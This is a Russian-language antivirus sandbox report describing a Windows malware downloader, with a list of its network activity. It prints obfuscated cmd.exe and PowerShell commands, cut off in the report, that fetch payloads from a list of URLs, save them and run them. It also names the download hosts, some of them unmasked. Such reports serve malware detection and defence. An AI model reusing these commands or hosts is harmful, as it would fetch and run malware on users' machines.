Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe; ,;,/V;;/C";;,(;(;,;,;(;(;(^s^et M^W^1^i=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ }^}^{hc^tac}^}kaer^b^;jDP^$ s^sec^orP^-tr^a^t^S^;^)^j^D^P^$^(^elifo^t^evas^.^pG^i^$^;^)^y^do^Besnop^ser...
Сетевая активность
Подключается к
- 'ro#####erproducts.co.za':80
- 'ka##.enko.ee':80
- '14#.###164-132-197.eu':80
TCP
Запросы HTTP GET
- http://ro#####erproducts.co.za/1To
- http://ka##.enko.ee/B
UDP
- DNS ASK ro#####erproducts.co.za
- DNS ASK ka##.enko.ee
- DNS ASK ec##pus.mk
- DNS ASK 14#.###164-132-197.eu
- DNS ASK ok##-43.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe; ,;,/V;;/C";;,(;(;,;,;(;(;(^s^et M^W^1^i=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ }^}^{hc^tac}^}kaer^b^;jDP^$ s^sec^orP^-tr^a^t^S^;^)^j^D^P^$^(^elifo^t^evas^.^pG^i^$^;^)^y^do^Besnop^ser...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' ; ,;,/V;;/C";;,(;(;,;,;(;(;(^s^et M^W^1^i=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ }^}^{hc^tac}^}kaer^b^;jDP^$ s^sec^orP^-tr^a^t^S^;^)^j^D^P^$^(^elifo^t^evas^.^pG^i^$^;^)^y^do^Besnop^ser.^jn^I^$^(^e^t^ir^w^....
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $Erh='iQz';$QLL='http://ro#####erproducts.co.za/1To@http://kaks.enko.ee/B@http://ecampus.mk/Mjq4JATm@http://142.ip-164-132-197.eu/P@http://okna-43.ru/dmoidUy'.Split('@');$PDj=([System.IO.Path]:...
